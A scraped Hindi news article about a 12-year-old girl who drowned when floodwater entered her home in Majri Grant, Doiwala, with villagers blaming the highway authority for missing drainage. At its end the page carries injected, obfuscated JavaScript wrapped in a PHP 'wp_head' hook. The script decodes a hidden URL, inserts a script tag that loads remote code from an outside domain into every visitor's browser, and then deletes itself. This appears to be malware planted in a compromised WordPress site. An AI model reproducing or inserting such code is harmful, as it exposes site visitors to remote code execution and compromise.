Saturday, July 27, 2024
spot_img

पानी के सैलाब में डूबने से लड़की की मौत! ग्रामीणों ने नेशनल हाईवे ऑफ अथॉरिटी को ठहराया जिम्मेदार

 

डोईवाला के माजरी ग्रांट में कुदरत ने कहर बरपाया है। दरअसल मूसलाधार बारिश की वजह से पानी के सैलाब में 12 वर्षीय लड़की की डूबने से मौत होने का मामला सामने आया है। वहीं ग्रामीणों ने हादसे का जिम्मेदार नेशनल हाईवे ऑफ अथॉरिटी को ठहराया है। देर रात हुई मूसलाधार बारिश से पूरे प्रदेश में तबाही का आलम देखने को मिल रहा है। इसी क्रम में डोईवाला में भी एक दर्दनाक हादसा सामने आया है। जहां माजरी ग्रांट में सैलाब का पानी दीवार तोड़कर घर में घुस गया। जिससे 12 वर्षीय लड़की की डूबने से मौत हो गई है। बताया जा रहा है कि लड़की घर में सो रही थी तभी वह हादसे का शिकार हो गई। ऐसे में परिजनों ने नेशनल हाईवे अथॉरिटी पर लापरवाही का आरोप लगाया है। लड़की के भाई उमानंद कोहली ने बताया कि 10 बजे के करीब जब सभी परिजन सो रहे थे, तभी खेतों की ओर से एक सैलाब के रूप में पानी उनके घर में घुस गया। जिससे किसी को भी सोचने समझने का मौका तक नहीं मिला। आनन-फानन में सभी परिजनों ने अपनी जान बचाई लेकिन 12 वर्षीय आकांक्षा का कुछ भी पता नहीं चल पाया। कुछ देर बाद बेहोशी की हालत में आकांक्षा पड़ी हुई मिली और पानी में डूबने से उसकी मौत हो गई। उप ग्राम प्रधान रामचंद्र ने बताया कि डेंटल कॉलेज के अपोजिट में यह घटना घटी है। खेतों का बस्ती की ओर ढलान होने के कारण सारा पानी बस्ती में एकत्रित हो गया और रात होने की वजह से इस सैलाब भरे पानी का ग्रामीणों को आभास नहीं हो पाया। उन्होंने बताया कि पानी की निकासी ना होने की वजह से यह पानी ग्रामीणों के घरों में घुस गया। जिससे यह घटना हुई है। वहीं अगर अभी भी पानी की निकासी नहीं हुई तो भविष्य में और दूसरी घटना घट सकती है।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>